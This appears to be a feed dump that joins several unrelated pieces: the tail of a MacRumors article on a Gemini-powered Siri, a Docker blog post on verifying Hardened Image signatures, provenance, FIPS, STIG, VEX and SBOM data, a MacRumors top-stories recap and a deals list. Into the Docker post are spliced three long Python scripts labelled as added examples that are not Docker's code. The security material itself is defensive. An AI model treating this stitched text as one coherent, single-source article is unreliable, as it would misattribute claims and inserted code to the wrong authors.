The revamped Siri reportedly experienced issues inside Apple, leading the company to turn to Google Gemini. The revamped Siri will technically still run on a new Apple Intelligence model that has Gemini's technology baked in.

Siri will reportedly get even better on iOS 27, as Apple is said to be planning to turn the assistant into a full-out chatbot, allowing users to have sustained, back-and-forth conversations with the assistant. This will essentially turn Siri into ChatGPT or Gemini, except it will be built right into the iPhone, iPad, and Mac, with no app required.

Gurman said the Siri chatbot will be "competitive with Gemini 3," and "significantly more capable" than the more personalized Siri coming with iOS 26.4.

This article, "Here's When Apple Plans to Unveil a New Siri Powered by Google Gemini" first appeared on MacRumors.com

Verifying Security and Compliance of Docker Hardened Images
In Part 1 of this series, we migrated a Node.js service to Docker Hardened Images (DHI) and measured impressive results: 100% vulnerability elimination, 90% package reduction, and 41.5% size decrease. We extracted the SBOM and saw compliance labels for FIPS, STIG, and CIS.
The numbers look compelling. But how do you verify these claims independently?
Security tools earn trust through verification, not promises. When evaluating a security product for production, you need cryptographic proof. This is especially true for images that form the foundation of every container you deploy. This post walks through the verification process: signature validation, provenance analysis, compliance evidence examination, and SBOM analysis. We’ll focus on practical verification you can run during your trial, with links to the official DHI documentation for deeper technical details. By the end, you’ll have independently confirmed DHI’s security posture and built confidence for a production scenario.

Understanding Security Attestations available with Docker Hardened Images
Before diving into verification, you need to understand what you’re verifying.
Docker Hardened Images include attestations: cryptographically-signed metadata about the image’s build process, contents, and compliance posture. These are signed statements that can be independently verified.
Important: If you’ve pulled the image locally, you need to use the registry:// prefix when working with attestations. This tells Docker Scout to look for attestations in the registry, not just the local image cache.
List all attestations for your hardened image:
docker scout attestation list registry://<your-org-namespace>/dhi-node:24.11-debian13-fips
This shows 16 different attestation types:
https://slsa.dev/provenance/v0.2            SLSA provenance
https://docker.com/dhi/fips/v0.1            FIPS compliance
https://docker.com/dhi/stig/v0.1            STIG scan
https://cyclonedx.org/bom/v1.6              CycloneDX SBOM
https://spdx.dev/Document                   SPDX SBOM
https://scout.docker.com/vulnerabilities    Scout vulnerabilities
https://scout.docker.com/secrets/v0.1       Scout secret scan
https://scout.docker.com/virus/v0.1         Scout virus/malware
https://scout.docker.com/tests/v0.1         Scout test report
https://openvex.dev/ns/v0.2.0               OpenVEX
...
Each attestation is a JSON document describing a specific aspect of the image. The most critical attestations for verification:
SLSA provenance: Build source, builder identity, and build process details
SBOM: Complete software bill of materials
FIPS compliance: Evidence of FIPS 140-3 certified cryptographic modules
STIG scan: Security Technical Implementation Guide compliance results
Vulnerability scan: CVE assessment
VEX report: CVE exploitability
These attestations follow the in-toto specification, an open framework for supply chain security. Each attestation includes:
Subject: What the attestation describes (the container image)
Predicate: The actual claims (FIPS certified, STIG compliant, etc.)
Signature: Cryptographic signature from the builder
Let’s see how you can verify the signatures yourself.
Verifying Attestations with Docker Scout
The attestations we’re about to examine are cryptographically signed by Docker’s build infrastructure. Docker Scout provides a simple, integrated approach that handles DHI attestations natively, without the hassle of managing public keys or certificate chains. To validate an attestation, simply append the --verify flag, which provides explicit validation feedback. This process relies on cryptographic hashing: the digest is a hash of the attestation content, so even a single-character change completely alters the hash. Moreover, the attestation’s signature is cryptographically bound to the specific image digest it describes, guaranteeing that the metadata you’re verifying corresponds exactly to the image you have and preventing substitution attacks.
Retrieving an Attestation
To extract a specific attestation (like SLSA provenance), use the attestation get command with the full predicate type URI:
docker scout attestation get registry://<your-org-namespace>/dhi-node:24.11-debian13-fips \
  --predicate-type https://slsa.dev/provenance/v0.2 \
  --output provenance.json
Success looks like this:
✓ SBOM obtained from attestation, 32 packages found
✓ Provenance obtained from attestation
✓ Report written to provenance.json
The checkmarks confirm Docker Scout successfully retrieved and verified the attestation. Behind the scenes, Scout validated:
The attestation signature matches Docker’s signing key
The signature hasn’t expired
The attestation applies to this specific image digest
The attestation hasn’t been tampered with
If signature verification fails, Scout returns an error and won’t output the attestation file. To learn more about available predicate types, check out the DHI verification documentation.
Validating SLSA Provenance
Signatures prove attestations are authentic. Provenance shows where the image came from.
SLSA (Supply-chain Levels for Software Artifacts) is a security framework developed by Google, the Linux Foundation, and other industry partners. It defines levels of supply chain security maturity, from SLSA 0 (no guarantees) to SLSA 4 (highest assurance).
Docker Hardened Images target SLSA 3, which requires:
Build process fully scripted/automated
All build steps defined in version control
Provenance generated automatically by build service
Provenance includes source, builder, and build parameters
Using our previously extracted SLSA provenance.json, we can check the source repository and commit hash:
jq '.predicate.invocation.environment.github_repository' provenance.json

Output:
"docker-hardened-images/definitions"

jq '.predicate.invocation.environment.github_sha1' provenance.json

Output:
"698b367344efb3a7d443508782de331a84216ae4"

Similarly, you can see exactly which GitHub Actions workflow run produced this image:

jq '.predicate.builder.id' provenance.json

Output:
"https://github.com/docker-hardened-images/definitions/actions/runs/18930640220/attempts/1"
For DHI Enterprise Users: Verifying High-Assurance Claims
While the free hardened images are built with security best practices, DHI Enterprise images carry the specific certifications required for FedRAMP, HIPAA, and financial audits. Here is how to verify those high-assurance claims.
FIPS 140-3 Validation
FIPS (Federal Information Processing Standard) 140-3 is a U.S. government standard for cryptographic modules. Think of it as a certification that proves the cryptography in your software has been tested and validated by independent labs against federal requirements.
If you’re building software for government agencies, financial institutions, or healthcare providers, FIPS compliance is often mandatory: without it, your software can’t be used in those environments!
Check if the image includes FIPS-certified cryptography:
docker scout attestation get registry://<your-org-namespace>/dhi-node:24.11-debian13-fips \
  --predicate-type https://docker.com/dhi/fips/v0.1 \
  --output fips-attestation.json

Output:
{
  "certification": "CMVP #4985",
  "certificationUrl": "https://csrc.nist.gov/projects/cryptographic-module-validation-program/certificate/4985",
  "name": "OpenSSL FIPS Provider",
  "package": "pkg:dhi/[email protected]",
  "standard": "FIPS 140-3",
  "status": "active",
  "sunsetDate": "2030-03-10",
  "version": "3.1.2"
}

The certificate number (4985) is the key piece. It references a specific FIPS validation in the official NIST CMVP database.
STIG Compliance
STIG (Security Technical Implementation Guide) is the Department of Defense’s (DoD) checklist for securing systems. It’s a comprehensive security configuration standard needed for deploying software for defense or government work.
DHI images undergo STIG scanning before release. Docker uses a custom STIG based on the DoD’s General Operating System Security Requirements Guide. Each scan checks dozens of security controls and reports findings. You can extract and review STIG scan results:
docker scout attestation get registry://<your-org-namespace>/dhi-node:24.11-debian13-fips \
  --predicate-type https://docker.com/dhi/stig/v0.1 \
  --output stig-attestation.json

Check the STIG scan summary:

jq '.predicate[0].summary' stig-attestation.json

Output:
{
  "failedChecks": 0,
  "passedChecks": 91,
  "notApplicableChecks": 107,
  "totalChecks": 198,
  "defaultScore": 100,
  "flatScore": 91
}

This shows DHI passed all 91 applicable STIG controls with zero failed checks and a 100% score. The 107 “notApplicableChecks” typically refer to controls that are irrelevant to the specific minimal container environment or its configuration. For a complete list of STIG controls and DHI compliance details, including how to extract and view the full STIG scan report, see the DHI STIG documentation.
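Pulling the provenance, FIPS and STIG checks above together: an added example (not Docker's code) that gates an image on the three attestation files written by the commands in this post. The sample documents are constructed inline from the fields shown above so it runs offline; EXPECTED_REPO and EXPECTED_BUILDER_PREFIX are assumed policy values that your organisation would set, and the FIPS file is assumed to hold either the bare predicate shown above or a full in-toto statement.

```python
import json
import re
import sys
from datetime import date

# Policy values (assumptions, set by your organisation): what a trustworthy build looks like.
EXPECTED_REPO = "docker-hardened-images/definitions"
EXPECTED_BUILDER_PREFIX = "https://github.com/docker-hardened-images/definitions/actions/runs/"
FULL_SHA1 = re.compile(r"^[0-9a-f]{40}$")
CMVP_CERT = re.compile(r"^CMVP #\d+$")

# Sample documents constructed from the fields shown on this page (not real attestation files).
SAMPLE_PROVENANCE = {
    "predicateType": "https://slsa.dev/provenance/v0.2",
    "predicate": {
        "builder": {"id": EXPECTED_BUILDER_PREFIX + "18930640220/attempts/1"},
        "invocation": {"environment": {
            "github_repository": "docker-hardened-images/definitions",
            "github_sha1": "698b367344efb3a7d443508782de331a84216ae4"}},
    },
}
SAMPLE_FIPS = {"certification": "CMVP #4985", "name": "OpenSSL FIPS Provider",
               "standard": "FIPS 140-3", "status": "active", "sunsetDate": "2030-03-10",
               "version": "3.1.2"}
SAMPLE_STIG = {"predicate": [{"summary": {"failedChecks": 0, "passedChecks": 91,
               "notApplicableChecks": 107, "totalChecks": 198, "defaultScore": 100,
               "flatScore": 91}}]}

def check_provenance(prov):
    """Violations in a SLSA v0.2 provenance: wrong repo, truncated commit id, unknown builder."""
    pred = prov.get("predicate", {})
    env = pred.get("invocation", {}).get("environment", {})
    builder_id = pred.get("builder", {}).get("id", "")
    problems = []
    if env.get("github_repository") != EXPECTED_REPO:
        problems.append(f"unexpected source repository {env.get('github_repository')!r}")
    if not FULL_SHA1.match(env.get("github_sha1", "")):
        problems.append("github_sha1 is not a full 40-hex commit id")
    if not builder_id.startswith(EXPECTED_BUILDER_PREFIX):
        problems.append(f"unexpected builder id {builder_id!r}")
    return problems

def check_fips(fips, today):
    """A FIPS claim only helps while the CMVP certificate is active and its sunset date is ahead."""
    fips = fips.get("predicate", fips)  # assumption: accept a bare predicate or a full statement
    problems = []
    if fips.get("standard") != "FIPS 140-3":
        problems.append(f"not a FIPS 140-3 claim: {fips.get('standard')!r}")
    if fips.get("status") != "active":
        problems.append(f"certificate status is {fips.get('status')!r}")
    if not CMVP_CERT.match(fips.get("certification", "")):
        problems.append("certification does not name a CMVP certificate number")
    sunset = fips.get("sunsetDate")
    if not sunset or date.fromisoformat(sunset) <= today:
        problems.append(f"certificate sunset date {sunset!r} is missing or has passed")
    return problems

def check_stig(stig):
    """Zero failed checks, and the counts must add up: a summary that does not is itself a finding."""
    s = stig["predicate"][0]["summary"]
    problems = []
    if s.get("failedChecks", 1) != 0:
        problems.append(f"{s.get('failedChecks')} STIG checks failed")
    counted = s.get("passedChecks", 0) + s.get("notApplicableChecks", 0) + s.get("failedChecks", 0)
    if counted != s.get("totalChecks", -1):
        problems.append("STIG check counts do not sum to totalChecks")
    return problems

def evaluate(prov, fips, stig, today=None):
    """All violations across the three attestations, evaluated as of `today` (ISO date string,
    default: the real date); an empty list means the image passes the gate."""
    as_of = date.fromisoformat(today) if today else date.today()
    return check_provenance(prov) + check_fips(fips, as_of) + check_stig(stig)

def load(path, fallback):
    """Read an attestation file written by `docker scout attestation get`, else use the sample."""
    try:
        with open(path, encoding="utf-8") as fh:
            return json.load(fh)
    except FileNotFoundError:
        return fallback

if __name__ == "__main__":
    problems = evaluate(load("provenance.json", SAMPLE_PROVENANCE),
                        load("fips-attestation.json", SAMPLE_FIPS),
                        load("stig-attestation.json", SAMPLE_STIG))
    for p in problems:
        print("FAIL:", p)
    print("PASS: image satisfies the attestation policy" if not problems else f"{len(problems)} problem(s)")
    sys.exit(1 if problems else 0)
```

Run it in the directory where the three attestation files were written; with no files present it evaluates the constructed samples, which pass.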
CIS Benchmark Hardening
CIS (Center for Internet Security) Benchmarks are security configuration standards created by security professionals across industries. Much like STIGs, they represent consensus best practices, but unlike government-mandated frameworks (FIPS, STIG), CIS benchmarks are community-developed.
CIS compliance isn’t legally required, but it demonstrates you’re following industry-standard security practices—valuable for customer trust and audit preparation.
You can verify CIS compliance through image labels:
docker inspect <your-org-namespace>/dhi-node:24.11-debian13-fips | \
  jq '.[0].Config.Labels["com.docker.dhi.compliance"]'

Output:
"fips,stig,cis"
The CIS label indicates that an image is hardened according to the CIS Docker Benchmark.
What exactly is a SBOM used for?
Compliance frameworks tell you what standards you meet. The SBOM tells you what’s actually in your container—and that’s where the real security work begins.
Identifying Transitive Dependencies
When you add a package to your project, you see the direct dependency. What you don’t see: that package’s dependencies, and their dependencies, and so on. This is the transitive dependency problem.
A vulnerability in a transitive dependency you’ve never heard of can compromise your entire application. Real example: the Log4Shell vulnerability affected millions of applications because Log4j was a transitive dependency buried several levels deep in dependency chains.
Most vulnerabilities hide in transitive dependencies because:
Developers don’t know they exist
They’re not updated when the direct dependency updates
Scanning tools miss them without an SBOM

Minimal images reduce this risk dramatically. Fewer packages = fewer transitive dependencies = smaller attack surface.
Compare dependency counts:
Official Node.js image: 321 packages, ~1,500 dependency relationships
DHI Node.js image: 32 packages, ~150 dependency relationships

90% reduction in packages means 90% reduction in transitive dependency risk.
Scanning for Known (Exploitable) Vulnerabilities
With the SBOM extracted, scan for known vulnerabilities:
docker scout cves registry://<your-org-namespace>/dhi-node:24.11-debian13-fips

Output:
Target: <your-org-namespace>/dhi-node:24.11-debian13-fips
0C 0H 0M 8L
8 vulnerabilities found in 2 packages
CRITICAL 0
HIGH 0
MEDIUM 0
LOW 8

Zero critical, high, or medium severity vulnerabilities. Docker Scout cross-references the SBOM against multiple vulnerability databases (NVD, GitHub Security Advisories, etc.). This is the payoff of minimal images: fewer packages means fewer potential vulnerabilities. The official Node.js image had 25 CVEs across CRITICAL, HIGH, and MEDIUM severities. The hardened version has zero actionable vulnerabilities—not because vulnerabilities were patched, but because vulnerable packages were removed entirely.
Understanding Exploitability with VEX
Not all CVEs are relevant to your deployment. A vulnerability in a library function your application never calls, or a flaw in a service that isn’t running, doesn’t pose real risk. Docker Hardened Images include signed VEX attestations that identify which reported CVEs are not actually exploitable in the image’s runtime context. This helps you distinguish between CVEs that exist in a package (reported), and CVEs that can actually be exploited given how the package is used in this specific image (exploitable). In other words, VEX reduces false positives.
Docker Scout applies VEX statements automatically when scanning DHI images: when you run docker scout cves, Scout uses VEX attestations to suppress vulnerabilities marked as non-exploitable.
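As an added example (not Docker Scout's implementation), here is the suppression logic the paragraph above describes, applied to a constructed OpenVEX v0.2.0 document and constructed scanner findings; the CVE ids and package URLs are placeholders, and the document shape follows the OpenVEX spec (statements with vulnerability.name, products[].@id, status and justification).

```python
from collections import Counter
from dataclasses import dataclass

OPENVEX_CONTEXT = "https://openvex.dev/ns/v0.2.0"

@dataclass(frozen=True)
class Finding:
    cve: str
    purl: str       # package URL the scanner attributed the CVE to
    severity: str

# Constructed OpenVEX document in the v0.2.0 shape (not a real DHI attestation;
# CVE ids and package URLs are placeholders).
SAMPLE_VEX = {
    "@context": OPENVEX_CONTEXT,
    "@id": "https://example.invalid/vex/constructed-demo",
    "author": "constructed example",
    "timestamp": "2026-01-20T00:00:00Z",
    "version": 1,
    "statements": [
        {   # vulnerable code is never executed: suppress, but only for this package
            "vulnerability": {"name": "CVE-0000-0001"},
            "products": [{"@id": "pkg:deb/debian/libexample@1.0.0"}],
            "status": "not_affected",
            "justification": "vulnerable_code_not_in_execute_path",
        },
        {   # explicitly affected: a statement exists, but the finding must stay visible
            "vulnerability": {"name": "CVE-0000-0002"},
            "products": [{"@id": "pkg:deb/debian/libexample@1.0.0"}],
            "status": "affected",
        },
        {   # not_affected without the justification the spec requires: do not trust it
            "vulnerability": {"name": "CVE-0000-0003"},
            "products": [{"@id": "pkg:deb/debian/libother@2.0"}],
            "status": "not_affected",
        },
    ],
}

# Constructed scanner findings, as a `docker scout cves` run might attribute them.
SAMPLE_FINDINGS = [
    Finding("CVE-0000-0001", "pkg:deb/debian/libexample@1.0.0", "HIGH"),
    Finding("CVE-0000-0001", "pkg:deb/debian/libother@2.0", "HIGH"),    # same CVE, other package
    Finding("CVE-0000-0002", "pkg:deb/debian/libexample@1.0.0", "MEDIUM"),
    Finding("CVE-0000-0003", "pkg:deb/debian/libother@2.0", "LOW"),
    Finding("CVE-0000-0004", "pkg:deb/debian/libother@2.0", "LOW"),     # no statement at all
]

def index_vex(vex):
    """Map (cve, purl) -> the statement that applies to that pair.
    Only the OpenVEX v0.2.0 context is accepted; a later statement overrides an earlier one."""
    if vex.get("@context") != OPENVEX_CONTEXT:
        raise ValueError(f"unsupported VEX context: {vex.get('@context')!r}")
    index = {}
    for stmt in vex.get("statements", []):
        cve = stmt.get("vulnerability", {}).get("name")
        for product in stmt.get("products", []):
            if cve and product.get("@id"):
                index[(cve, product["@id"])] = stmt
    return index

def is_suppressible(stmt):
    """A finding may be hidden only by a not_affected statement that carries the
    justification or impact_statement OpenVEX requires for that status."""
    return stmt.get("status") == "not_affected" and bool(
        stmt.get("justification") or stmt.get("impact_statement"))

def apply_vex(findings, vex):
    """Split findings into (still reported, suppressed-with-reason), matching on CVE and package."""
    index = index_vex(vex)
    kept, suppressed = [], []
    for f in findings:
        stmt = index.get((f.cve, f.purl))
        if stmt and is_suppressible(stmt):
            suppressed.append((f, stmt.get("justification") or stmt["impact_statement"]))
        else:
            kept.append(f)
    return kept, suppressed

def severity_line(findings):
    """Scout-style one-line summary of what remains, e.g. '0C 0H 0M 8L'."""
    counts = Counter(f.severity for f in findings)
    return " ".join(f"{counts.get(sev, 0)}{sev[0]}" for sev in ("CRITICAL", "HIGH", "MEDIUM", "LOW"))

if __name__ == "__main__":
    kept, suppressed = apply_vex(SAMPLE_FINDINGS, SAMPLE_VEX)
    for f, reason in suppressed:
        print(f"suppressed {f.cve} in {f.purl}: {reason}")
    print(f"reported after VEX: {severity_line(kept)}")
```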
You can see which CVEs have been evaluated with this command:
docker scout attestation get registry://<your-org-namespace>/dhi-node:24.11-debian13-fips \
  --predicate-type https://openvex.dev/ns/v0.2.0 \
  --output vex.json

License Compliance Analysis
When you use open source software, you’re bound by license terms. Some licenses (MIT, Apache) are permissive and you can use them freely, even in commercial products. Others (GPL, AGPL) are copyleft: they require you to release your source code if you distribute software using them.
SBOMs make license compliance visible. Without an SBOM, you’re blind to what licenses your containers include.
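An added example (not from the post) of turning that visibility into a policy check: it triages each package's licenseConcluded in an SPDX 2.x document like the one exported in the next step and, unlike a plain jq | sort | uniq -c count, evaluates compound SPDX expressions (AND, OR, WITH) instead of treating them as opaque strings. The PERMISSIVE and COPYLEFT sets are assumptions to align with your own policy, and the SBOM below is constructed.

```python
import json
import re
import sys

# Policy sets (assumptions: align them with your own license policy).
PERMISSIVE = {"MIT", "Apache-2.0", "BSD-2-Clause", "BSD-3-Clause", "ISC", "OpenSSL", "Zlib"}
COPYLEFT = {"GPL-2.0-only", "GPL-2.0-or-later", "GPL-3.0-only", "GPL-3.0-or-later",
            "AGPL-3.0-only", "AGPL-3.0-or-later", "LGPL-2.1-or-later", "LGPL-3.0-or-later"}
RANK = {"permissive": 0, "needs-review": 1, "copyleft": 2}   # higher = worse for a commercial product
CLASS = {v: k for k, v in RANK.items()}
TOKEN = re.compile(r"\(|\)|[A-Za-z0-9.+\-]+")

# Constructed SPDX 2.x document (not a real DHI SBOM).
SAMPLE_SBOM = {
    "spdxVersion": "SPDX-2.3",
    "packages": [
        {"name": "libmit", "licenseConcluded": "MIT"},
        {"name": "libapache", "licenseConcluded": "Apache-2.0"},
        {"name": "libgpl", "licenseConcluded": "GPL-2.0-or-later"},
        {"name": "dual", "licenseConcluded": "MIT OR GPL-2.0-only"},
        {"name": "combo", "licenseConcluded": "(MIT AND BSD-3-Clause)"},
        {"name": "classpath", "licenseConcluded": "GPL-2.0-only WITH Classpath-exception-2.0"},
        {"name": "mystery", "licenseConcluded": "NOASSERTION"},
        {"name": "mixed", "licenseConcluded": "Apache-2.0 AND NOASSERTION"},
    ],
}

def _atom_rank(license_id):
    if license_id in PERMISSIVE:
        return RANK["permissive"]
    if license_id in COPYLEFT:
        return RANK["copyleft"]
    return RANK["needs-review"]   # NOASSERTION, NONE, LicenseRef-*, anything unknown

def _parse_or(tokens, pos):
    """expr := and_expr (OR and_expr)*; OR lets you pick the most favourable operand (min rank)."""
    rank, pos = _parse_and(tokens, pos)
    while pos < len(tokens) and tokens[pos].upper() == "OR":
        rhs, pos = _parse_and(tokens, pos + 1)
        rank = min(rank, rhs)
    return rank, pos

def _parse_and(tokens, pos):
    """and_expr := atom (AND atom)*; AND binds you to every operand (max rank)."""
    rank, pos = _parse_atom(tokens, pos)
    while pos < len(tokens) and tokens[pos].upper() == "AND":
        rhs, pos = _parse_atom(tokens, pos + 1)
        rank = max(rank, rhs)
    return rank, pos

def _parse_atom(tokens, pos):
    """atom := '(' expr ')' | ID [WITH exception]; an exception lifts the rank to at least needs-review."""
    if pos >= len(tokens):
        raise ValueError("unexpected end of license expression")
    if tokens[pos] == "(":
        rank, pos = _parse_or(tokens, pos + 1)
        if pos >= len(tokens) or tokens[pos] != ")":
            raise ValueError("unbalanced parenthesis in license expression")
        return rank, pos + 1
    rank, pos = _atom_rank(tokens[pos]), pos + 1
    if pos < len(tokens) and tokens[pos].upper() == "WITH":
        rank, pos = max(rank, RANK["needs-review"]), pos + 2   # skip WITH and the exception id
    return rank, pos

def classify(expression):
    """Map one SPDX licenseConcluded value to permissive / needs-review / copyleft;
    anything unparsable is sent to review rather than guessed."""
    tokens = TOKEN.findall(expression or "")
    try:
        rank, pos = _parse_or(tokens, 0)
    except ValueError:
        return "needs-review"
    return CLASS[rank] if pos == len(tokens) else "needs-review"

def triage(sbom):
    """Group every SPDX package name by its license class, worst class first."""
    groups = {"copyleft": [], "needs-review": [], "permissive": []}
    for pkg in sbom.get("packages", []):
        groups[classify(pkg.get("licenseConcluded", "NOASSERTION"))].append(pkg.get("name", "?"))
    return groups

if __name__ == "__main__":
    if len(sys.argv) > 1:                       # e.g. node-sbom-spdx.json from the export step
        with open(sys.argv[1], encoding="utf-8") as fh:
            doc = json.load(fh)
    else:
        doc = SAMPLE_SBOM
    for cls, names in triage(doc).items():
        print(f"{cls:13s}{len(names):3d}  {', '.join(names)}")
```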
Export the SBOM in SPDX format:
docker scout sbom registry://<your-org-namespace>/dhi-node:24.11-debian13-fips \
  --format spdx \
  --output node-sbom-spdx.json

Analyze license distribution:

jq '.packages[].licenseConcluded' node-sbom-spdx.json | \
  sort | uniq -c | sort -rn

Output:
15 "MIT"
8 "Apache-2.0"
5 "GPL-2.0-or-later"
2 "BSD-3-Clause"
1 "OpenSSL"
1 "NOASSERTION"

In this example:
✅ MIT and Apache-2.0 are permissive (safe for commercial use)
⚠️ GPL-2.0-or-later requires review (is this a runtime dependency or build tool?)
⚠️ NOASSERTION needs investigation

Conclusion: What You’ve Proven
You’ve independently verified critical security claims Docker makes about Hardened Images:
Authenticity: Cryptographic signatures prove images are genuine and unmodified
Provenance: SLSA attestations trace builds to specific source commits in public repositories
Compliance: FIPS certificate, STIG controls passed, and CIS benchmarks met
Security posture

Every claim you verified (except CIS) has a corresponding attestation you can check yourself, audit, and validate in your CI/CD pipeline.
You can customize a Docker Hardened Image (DHI) to suit your specific needs using the Docker Hub UI. This allows you to select a base image, add packages, add OCI artifacts (such as custom certificates or additional tools), and configure settings. In addition, the build pipeline ensures that your customized image is built securely and includes attestations.
In Part 3, we’ll cover how to customize Docker Hardened Images to suit your specific needs, while keeping all the benefits we just explored.
You’ve confirmed DHI delivers on security promises. Next, we’ll make it operational.

If you missed reading part 1, where we discussed how you can get to 100% vulnerability elimination and 90% package reduction, read the blog here.

Apple rumors are starting to pick up now that we're a few weeks into 2026, and this week saw some potential clarity around conflicting iPhone 18 Pro rumors, plus some new word on Apple's plans for Siri.


This week also saw a report that Apple is working on some sort of AI pin while also making progress toward a major MacBook Pro revamp, so read on below for all the details!

Top Stories

iPhone 18 Pro Leak: Smaller Dynamic Island, No Top-Left Camera Cutout

Over the last few months, rumors around the iPhone 18 Pro's front-panel design have been conflicted, with some supply chain leaks pointing to under-display Face ID, reports suggesting a top-left hole-punch camera, and debate over whether the familiar Dynamic Island will shrink, shift, or disappear entirely.


According to frequent Weibo-based leaker Instant Digital, however, early reports from Chinese and Korean sources about the possible relocation of an infrared Face ID component were later mistranslated in some English-language coverage, leading to incorrect claims of a hole-punch camera. In fact, the Dynamic Island will remain on the iPhone 18 Pro and simply be roughly 35% narrower. That smaller Dynamic Island interpretation has also been corroborated by respected display analyst Ross Young.

Apple's OLED MacBook Pro Launch Moves Closer With Panel Production

Rumors have been pointing toward Apple launching a revamped MacBook Pro with OLED displays late this year or early next year, and things appear to have taken a step forward this month with a report claiming that Samsung's production line that will produce displays for the new laptop has gone into operation.


The MacBook Pro is just one of five Apple products expected to gain OLED displays in the next few years as Apple continues to adopt the more advanced display technology.

Before the MacBook Pro gets OLED displays, there's still another update to the current version in the works to add M5 Pro and M5 Max chips, with rumors and shipping delays suggesting a launch could be coming fairly soon.

A Siri Chatbot is Coming in iOS 27

Apple plans to turn Siri into a chatbot that will rival Anthropic's Claude, Google's Gemini, and OpenAI's ChatGPT, Bloomberg reported this week. Apple did not initially plan to introduce a chatbot, but their popularity forced Apple executives to reconsider.


Codenamed Campos, the ‌Siri‌ chatbot will be integrated into iOS 27, iPadOS 27, and macOS 27, replacing the current version of ‌Siri‌. It will have the same natural language conversation functionality as chatbots like ChatGPT, and it will be accessible by using the "‌Siri‌" wake word or by holding down the side button on an iPhone or iPad.

The chatbot version of Siri arriving in iOS 27 later this year will follow the initial upgrade to a more personalized version of the current Siri that we expect to arrive in just a few months with iOS 26.4.

Apple's Next iPhone: What to Expect From the 2026 iPhone 17e

We're likely just weeks away from Apple's next iPhone launch, with the company set to introduce the ‌iPhone‌ 17e. The ‌iPhone‌ 17e is a follow-up to the iPhone 16e that came out in February 2025, and rumors suggest that it could have some welcome improvements.


Check out our recap of all the rumors we've heard about the next version of Apple's cheapest iPhone model to help decide if it might be the right one for you.

Apple Developing AirTag-Sized AI Pin With Dual Cameras

Apple is working on a small, wearable AI pin equipped with multiple cameras, a speaker, and microphones, reports The Information. If it actually launches, the AI pin will likely run the new Siri chatbot that Apple plans to unveil in iOS 27.


The pin is said to be similar in size to an AirTag, with a thin, flat, circular disc shape. It has an aluminum and glass shell, and two cameras at the front. There is a standard lens and a wide-angle lens that are meant to capture photos and videos, while three microphones are designed to pick up sound around the wearer. An included speaker allows the pin to play audio, and there is a physical control button along one edge. The device is able to wirelessly charge like an Apple Watch.

iPhone 18 Rumored to Feature Much Brighter Display

Apple's iPhone 18 will feature a significantly brighter display, according to a Chinese leaker.


In a post this week on Weibo, the user known as Instant Digital said that Chinese supplier BOE has little hope of making panels for the ‌iPhone 18‌ because Apple's brightness requirements for the next-generation device are unprecedentedly high. This suggests that the ‌iPhone 18‌'s display will see a considerable leap forward in terms of brightness.

While the iPhone 18 Pro and Pro Max are expected to launch in the usual September time frame, the regular iPhone 18‌ isn't expected to launch until early 2027.

MacRumors Newsletter

Each week, we publish an email newsletter like this highlighting the top Apple stories, making it a great way to get a bite-sized recap of the week hitting all of the major topics we've covered and tying together related stories for a big-picture view.

So if you want to have top stories like the above recap delivered to your email inbox each week, subscribe to our newsletter!
This article, "Top Stories: iPhone 18 Pro Leaks, Siri Chatbot, Apple AI Pin, and More" first appeared on MacRumors.com

This week saw a wide range of Apple-related deals, including some of the lowest prices we've seen in months on the Apple Studio Display, plus solid discounts on the M4 Mac mini, Mac-compatible monitors from Samsung, popular desktop accessories from Satechi, and even more.

Note: MacRumors is an affiliate partner with some of these vendors. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.

Amazon Sale


What's the deal? Take up to $450 off popular accessories
Where can I get it? Amazon
Where can I find the original deal? Right here
$450 OFF: Ecovacs Deebot T80 Pro Robot Vacuum for $549.99
$350 OFF: Ecovacs Deebot X8 Pro Robot Vacuum for $749.00

Amazon this week has a few notable sales from popular brands like Ecovacs, Jackery, and Anker. These include discounts on everything from MagSafe-compatible chargers to portable power stations and robot vacuums.

Ecovacs Deebot X9 Pro Omni Robot Vacuum and Mop - $699.00, down from $799.00
Ecovacs Deebot X11 OmniCyclone Robot Vacuum and Mop - $1,099.00, down from $1,499.99
Anker MagGo UFO 3-in-1 Qi2 Charger - $61.98, down from $89.99
Anker 3-in-1 MagSafe-Compatible Charging Cube - $97.49, down from $149.95
Anker 14-Port Prime Docking Station - $169.99, down from $269.99
Anker SOLIX C300 Power Station with Lantern - $179.99, down from $249.00
Jackery Explorer 1000 V2 Portable Power Station - $399.00, down from $799.00
Jackery Explorer 1500 Portable Power Station - $898.99, down from $1,399.00

Apple Studio Display


What's the deal? Take up to $450 off Apple Studio Display
Where can I get it? Woot
Where can I find the original deal? Right here
UP TO $450 OFF: Apple Studio Display at Woot

Woot this week started a new Apple sale that includes some of the lowest prices we've tracked on the Studio Display in months. The items that we're focusing on in this sale are all in new condition and come with a one year Apple limited warranty, but there are other items that are refurbished.

Prices on the 27-inch Studio Display start at $1,349.00 for the standard glass/VESA mount adapter, down from $1,599.00, and also include all of the nano-texture glass options. We haven't tracked deals on the Studio Display in quite a while, so these are solid markdowns for anyone who's been waiting for a sale.

Mac Mini


What's the deal? Take up to $130 off M4 Mac mini
Where can I get it? Amazon
Where can I find the original deal? Right here
$100 OFF: M4 Mac mini (256GB) for $499.00
$110 OFF: M4 Mac mini (16GB/512GB) for $689.00
$109 OFF: M4 Mac mini (24GB/512GB) for $889.99
$130 OFF: M4 Pro Mac mini (24GB/512GB) for $1,269.00

Amazon this week has a few models of Apple's M4 Mac mini on sale at low prices, starting at $499.99 for the model with 16GB RAM/256GB SSD, down from $599.00. Discounts reach up to $130 off in these sales, and this time around there is also a discount on the M4 Pro model.

Satechi


What's the deal? Take 20% off Satechi's new products
Where can I get it? Satechi
Where can I find the original deal? Right here
Note: Use code CES2026 to see this discount.
UP TO 20% OFF: Satechi's CES 2026 Sale
Note: Use code REFRESH20 to see this discount.
20% OFF: Satechi's Refresh 2026 Sale

Satechi announced a few products at CES this month, and to mark the launch it's providing a 20 percent discount on these devices for early adopters. You can use the code CES2026 at checkout to get 20 percent off all five of Satechi's newest products.

Additionally, Satechi recently kicked off a new sale that has its most popular desktop accessories at 20 percent off for a limited time. To get this discount, enter the code REFRESH20 at checkout on the accessories found in Satechi's "Desk Refresh Collection."

Samsung


What's the deal? Save on Samsung monitors and TVs
Where can I get it? Samsung
Where can I find the original deal? Right here
$300 OFF: 32-inch Smart Monitor M9 for $1,299.99
$600 OFF: 65-inch The Frame for $1,199.99
$1,200 OFF: 75-inch The Frame Pro for $1,999.99

